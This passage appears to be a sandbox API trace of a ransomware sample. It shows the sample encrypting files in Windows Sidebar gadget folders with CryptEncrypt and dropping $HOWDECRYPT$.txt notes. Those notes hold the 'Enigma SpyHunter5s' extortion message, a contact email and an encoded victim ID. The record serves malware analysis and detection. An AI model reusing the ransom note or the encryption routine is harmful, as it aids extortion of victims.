returned 0x31f278 [0161.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8a0*=0x30) returned 1 [0161.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\info.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\info.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.401] GetProcessHeap () returned 0x2c0000 [0161.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.401] GetProcessHeap () returned 0x2c0000 [0161.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a588 | out: hHeap=0x2c0000) returned 1 [0161.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8a8 | out: pbBuffer=0x25ce8a8) returned 1 [0161.401] GetProcessHeap () returned 0x2c0000 [0161.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8a0*=0x30) returned 1 [0161.401] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-middle.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-middle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.412] GetProcessHeap () returned 0x2c0000 [0161.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.414] GetProcessHeap () returned 0x2c0000 [0161.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec93c0 | out: hHeap=0x2c0000) returned 1 [0161.415] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8a0 | out: pbBuffer=0x25ce8a0) returned 1 [0161.415] GetProcessHeap () returned 0x2c0000 [0161.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0161.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce898*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce898*=0x30) returned 1 [0161.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\add_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\add_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.416] GetProcessHeap () returned 0x2c0000 [0161.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0161.416] GetProcessHeap () returned 0x2c0000 [0161.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87af8 | out: hHeap=0x2c0000) returned 1 [0161.421] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8a0 | out: pbBuffer=0x25ce8a0) returned 1 [0161.421] GetProcessHeap () returned 0x2c0000 [0161.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce898*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce898*=0x30) returned 1 [0161.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\service.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\service.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.444] GetProcessHeap () returned 0x2c0000 [0161.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.445] GetProcessHeap () returned 0x2c0000 [0161.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87a00 | out: hHeap=0x2c0000) returned 1 [0161.445] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce898 | out: pbBuffer=0x25ce898) returned 1 [0161.445] GetProcessHeap () returned 0x2c0000 [0161.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.445] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce890*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce890*=0x30) returned 1 [0161.445] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\currency.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\currency.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.446] GetProcessHeap () returned 0x2c0000 [0161.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.446] GetProcessHeap () returned 0x2c0000 [0161.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecb140 | out: hHeap=0x2c0000) returned 1 [0161.447] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce898 | out: pbBuffer=0x25ce898) returned 1 [0161.447] GetProcessHeap () returned 0x2c0000 [0161.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.447] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce890*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce890*=0x30) returned 1 [0161.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.447] GetProcessHeap () returned 0x2c0000 [0161.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.447] GetProcessHeap () returned 0x2c0000 [0161.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f1d0 | out: hHeap=0x2c0000) returned 1 [0161.447] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.449] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.449] WriteFile (in: hFile=0x178, lpBuffer=0x25ce7c7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce8f0, lpOverlapped=0x0 | out: lpBuffer=0x25ce7c7*, lpNumberOfBytesWritten=0x25ce8f0*=0x127, lpOverlapped=0x0) returned 1 [0161.450] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.450] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce8f0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce8f0*=0x2ac, lpOverlapped=0x0) returned 1 [0161.450] CloseHandle (hObject=0x178) returned 1 [0161.450] GetProcessHeap () returned 0x2c0000 [0161.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87810 | out: hHeap=0x2c0000) returned 1 [0161.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce890 | out: pbBuffer=0x25ce890) returned 1 [0161.451] GetProcessHeap () returned 0x2c0000 [0161.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce888*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce888*=0x30) returned 1 [0161.451] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass_lrg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.461] GetProcessHeap () returned 0x2c0000 [0161.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.461] GetProcessHeap () returned 0x2c0000 [0161.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a2b8 | out: hHeap=0x2c0000) returned 1 [0161.461] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce888 | out: pbBuffer=0x25ce888) returned 1 [0161.461] GetProcessHeap () returned 0x2c0000 [0161.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.461] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce880*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce880*=0x30) returned 1 [0161.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial_lrg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.521] GetProcessHeap () returned 0x2c0000 [0161.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.522] GetProcessHeap () returned 0x2c0000 [0161.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1cb0 | out: hHeap=0x2c0000) returned 1 [0161.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce888 | out: pbBuffer=0x25ce888) returned 1 [0161.522] GetProcessHeap () returned 0x2c0000 [0161.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25ce880*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25ce880*=0x30) returned 1 [0161.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.536] GetProcessHeap () returned 0x2c0000 [0161.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.536] GetProcessHeap () returned 0x2c0000 [0161.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1ad0 | out: hHeap=0x2c0000) returned 1 [0161.536] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.547] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.547] WriteFile (in: hFile=0x178, lpBuffer=0x25ce7b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce8e0, lpOverlapped=0x0 | out: lpBuffer=0x25ce7b7*, lpNumberOfBytesWritten=0x25ce8e0*=0x127, lpOverlapped=0x0) returned 1 [0161.548] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.548] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce8e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce8e0*=0x2ac, lpOverlapped=0x0) returned 1 [0161.548] CloseHandle (hObject=0x178) returned 1 [0161.548] GetProcessHeap () returned 0x2c0000 [0161.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafbb8 | out: hHeap=0x2c0000) returned 1 [0161.548] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce880 | out: pbBuffer=0x25ce880) returned 1 [0161.548] GetProcessHeap () returned 0x2c0000 [0161.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce878*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce878*=0x30) returned 1 [0161.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.646] GetProcessHeap () returned 0x2c0000 [0161.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.646] GetProcessHeap () returned 0x2c0000 [0161.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb29b8 | out: hHeap=0x2c0000) returned 1 [0161.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce878 | out: pbBuffer=0x25ce878) returned 1 [0161.646] GetProcessHeap () returned 0x2c0000 [0161.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce870*=0x30) returned 1 [0161.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.703] GetProcessHeap () returned 0x2c0000 [0161.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.703] GetProcessHeap () returned 0x2c0000 [0161.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed18f0 | out: hHeap=0x2c0000) returned 1 [0161.703] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce878 | out: pbBuffer=0x25ce878) returned 1 [0161.703] GetProcessHeap () returned 0x2c0000 [0161.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.703] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce870*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce870*=0x30) returned 1 [0161.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.703] GetProcessHeap () returned 0x2c0000 [0161.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.704] GetProcessHeap () returned 0x2c0000 [0161.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1710 | out: hHeap=0x2c0000) returned 1 [0161.704] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce870 | out: pbBuffer=0x25ce870) returned 1 [0161.704] GetProcessHeap () returned 0x2c0000 [0161.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.704] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce868*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce868*=0x30) returned 1 [0161.704] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.737] GetProcessHeap () returned 0x2c0000 [0161.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.737] GetProcessHeap () returned 0x2c0000 [0161.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1620 | out: hHeap=0x2c0000) returned 1 [0161.737] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce870 | out: pbBuffer=0x25ce870) returned 1 [0161.737] GetProcessHeap () returned 0x2c0000 [0161.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.737] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce868*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce868*=0x30) returned 1 [0161.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.740] GetProcessHeap () returned 0x2c0000 [0161.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.740] GetProcessHeap () returned 0x2c0000 [0161.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1350 | out: hHeap=0x2c0000) returned 1 [0161.740] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce868 | out: pbBuffer=0x25ce868) returned 1 [0161.741] GetProcessHeap () returned 0x2c0000 [0161.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.741] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce860*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce860*=0x30) returned 1 [0161.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.749] GetProcessHeap () returned 0x2c0000 [0161.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.750] GetProcessHeap () returned 0x2c0000 [0161.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf8b8 | out: hHeap=0x2c0000) returned 1 [0161.750] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce868 | out: pbBuffer=0x25ce868) returned 1 [0161.750] GetProcessHeap () returned 0x2c0000 [0161.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.750] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce860*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce860*=0x30) returned 1 [0161.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.752] GetProcessHeap () returned 0x2c0000 [0161.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.752] GetProcessHeap () returned 0x2c0000 [0161.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87148 | out: hHeap=0x2c0000) returned 1 [0161.752] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce860 | out: pbBuffer=0x25ce860) returned 1 [0161.752] GetProcessHeap () returned 0x2c0000 [0161.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.752] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce858*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce858*=0x30) returned 1 [0161.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\spacer_highlights.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\spacer_highlights.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.752] GetProcessHeap () returned 0x2c0000 [0161.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.752] GetProcessHeap () returned 0x2c0000 [0161.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c885e8 | out: hHeap=0x2c0000) returned 1 [0161.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce860 | out: pbBuffer=0x25ce860) returned 1 [0161.753] GetProcessHeap () returned 0x2c0000 [0161.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce858*=0x20, dwBufLen=0x30 